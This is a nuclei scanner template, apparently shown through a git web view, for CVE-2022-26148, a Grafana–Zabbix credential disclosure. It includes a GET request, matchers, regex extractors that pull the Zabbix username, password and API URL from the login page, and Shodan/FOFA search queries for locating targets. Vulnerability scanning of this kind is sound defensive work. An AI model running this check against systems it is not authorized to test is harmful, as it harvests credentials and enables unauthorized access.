nuclei-templates/http/cves/2022/CVE-2022-26148.yaml

69 lines
2.3 KiB
YAML
Raw Normal View History

id: CVE-2022-26148
info:
name: Grafana & Zabbix Integration - Credentials Disclosure
author: Geekby
severity: critical
description: |
Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.
2023-09-27 15:51:13 +00:00
impact: |
An attacker can obtain sensitive credentials, leading to unauthorized access and potential data breaches.
2023-09-06 11:59:08 +00:00
remediation: |
Update to the latest version of the Grafana & Zabbix Integration plugin to fix the vulnerability.
reference:
- https://2k8.org/post-319.html
- https://security.netapp.com/advisory/ntap-20220425-0005/
- https://nvd.nist.gov/vuln/detail/CVE-2022-26148
- https://github.com/HimmelAward/Goby_POC
- https://github.com/Z0fhack/Goby_POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-26148
2023-07-11 19:49:27 +00:00
cwe-id: CWE-312
epss-score: 0.15727
epss-percentile: 0.95795
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: grafana
product: grafana
2023-09-06 11:59:08 +00:00
shodan-query: title:"Grafana"
fofa-query: app="Grafana"
2024-05-31 19:23:20 +00:00
google-query: intitle:"grafana"
tags: cve,cve2022,grafana,zabbix,exposure
http:
- method: GET
path:
- "{{BaseURL}}/login?redirect=%2F"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"zabbix":'
- '"zbx":'
- "alexanderzobnin-zabbix-datasource"
condition: or
2023-07-11 19:49:27 +00:00
- type: regex
part: body
regex:
- '"password":"(.*?)"'
- '"username":"(.*?)"'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- '"password":"(.*?)"'
- '"username":"(.*?)"'
- '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php'
# digest: 4b0a00483046022100a139554a17ea123a9c2e59ac77e260256394de84e1c3b6d88004efe8dd0340da022100f744af2af84e2ab78fc970895b8702d5bc14aa4035a42ef57fbf3094b3c5a6cb:922c64590222798bb761d5b6d8e72950